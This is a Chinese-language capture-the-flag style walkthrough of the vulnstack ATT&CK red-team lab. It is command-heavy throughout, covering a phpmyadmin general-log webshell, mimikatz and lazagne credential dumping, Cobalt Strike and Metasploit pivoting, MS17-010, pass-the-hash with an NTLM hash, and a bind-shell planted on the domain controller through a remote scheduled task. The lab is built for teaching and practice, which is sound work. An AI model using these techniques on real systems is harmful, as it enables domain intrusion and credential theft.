ATT&CK紅隊評估實戰靶場(一)
靶機下載地址 //vulnstack.qiyuanxuetang.net/vuln/detail/2/
攻擊拓撲如下
0x01環境搭建
配置兩卡,僅主機模式192.168.52.0網段模擬內網,192.168.72.0網段模擬外網
Kali linux IP 192.168.72.131
win7 IP 192.168.72.130/192.168.52.143
win2003 IP 192.168.72.141
DC 2008 IP 192.168.52.138
0X02資訊收集
用nmap找到外網IP地址
netdiscover -i eth0 -r 192.168.72.0/24
御劍掃目錄掃到後台
掃到目錄//192.168.72.130/phpmyadmin/
弱口令root /root進入後台
0x03phpmyadmin後台getshell
show variables like ‘%general%’; #查看日誌狀態
SET GLOBAL general_log=’on’
SET GLOBAL general_log_file=’C:/phpStudy/www/233.php’ 設置路徑
SELECT ‘‘ //寫入一句話木馬
getshell
//192.168.72.130/233.php
0x04許可權提升
直接用Cs的腳本ms14-068提權
0x05內網資訊收集
把webshell轉換成cs上線
ipconfig /all
hashdump看一下密碼
再用mimikatz抓一下明文密碼,抓到hongrisec@2020
shell net user /domain
查看域內用戶
使用lodan掃描內網網路
使用lazagone.exe 抓取本機所有密碼
抓到了很多win7機器上的密碼
用Msf的這個模組可以判斷目標機器上面裝了那些軟體
run post/windows/gather/enum_applications 使用這個之後發現win7(雙網卡機器)上有一個現成的nmap
直接用beacon下的nmap去掃描DC的漏洞 shell nmap –script=vuln 192.168.52.138 發現域控存在ms17-010
這裡其實已經可以直接去用Msf打域控的17010了
0x06MSF與CS聯動
新啟一個監聽,用foriereverse_tcp,然後msf開始監聽埠,成功轉接cs的shell
查看當前網段並添加路由
0x07配置msf代理
之前掃描的是DC,先看一下2003有沒有漏洞,掃一下141,其實不掛代理也行,win7裡面有一個Nmap,這裡要注意socks代理不支援icmp協議
proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 –script=smb-vuln-ms17-010.nse 192.168.52.141
0x08兩種拿下2003
因為已經知道了漏洞,直接永恆之藍打過去了
PTH方法
選擇之前生成的那個smb beacon 然後在用哈希傳遞的方法,域內管理員的帳號直接登錄
192.168.52.141成功上線
0x09票據+計劃任務拿DC
mimikatz sekurlsa::pth /domain:god.org /user:administrator /ntlm:81be2f80d568100549beac645d6a7141
shell dir \192.168.52.138\c$ //dir DC的目錄
生成一個exe馬
這裡用windows/reverse_bind_tcp LHOST=0.0.0.0 LPORT=7777 生成正向的馬 yukong.exe
把馬複製到域控機器上shell copy C:\yukong.exe \192.168.52.138\c$
然後再用這個寫入計劃任務的方法去連接,這裡馬反彈會連不成功,所以
shell schtasks /create /tn “test” /tr C:\yukong.exe /sc once /st 22:14 /S 192.168.52.138 /RU System /u administrator /p “hongrisec@2020”
掛著win7代理 proxy nc -vv 192.168.52.138 7777 即可彈回DC138的shell
用Meterpreter的馬也可以,之前失敗了,後續還是改成meterpreter的馬,或者把普通shell再升級成meterpreter再導入cs也可以
馬上線之後清除計劃任務schtasks /delete /s 192.168.52.138 /tn “test” /f
本靶場有很多地方都可以打成功,可以自己嘗試一下。
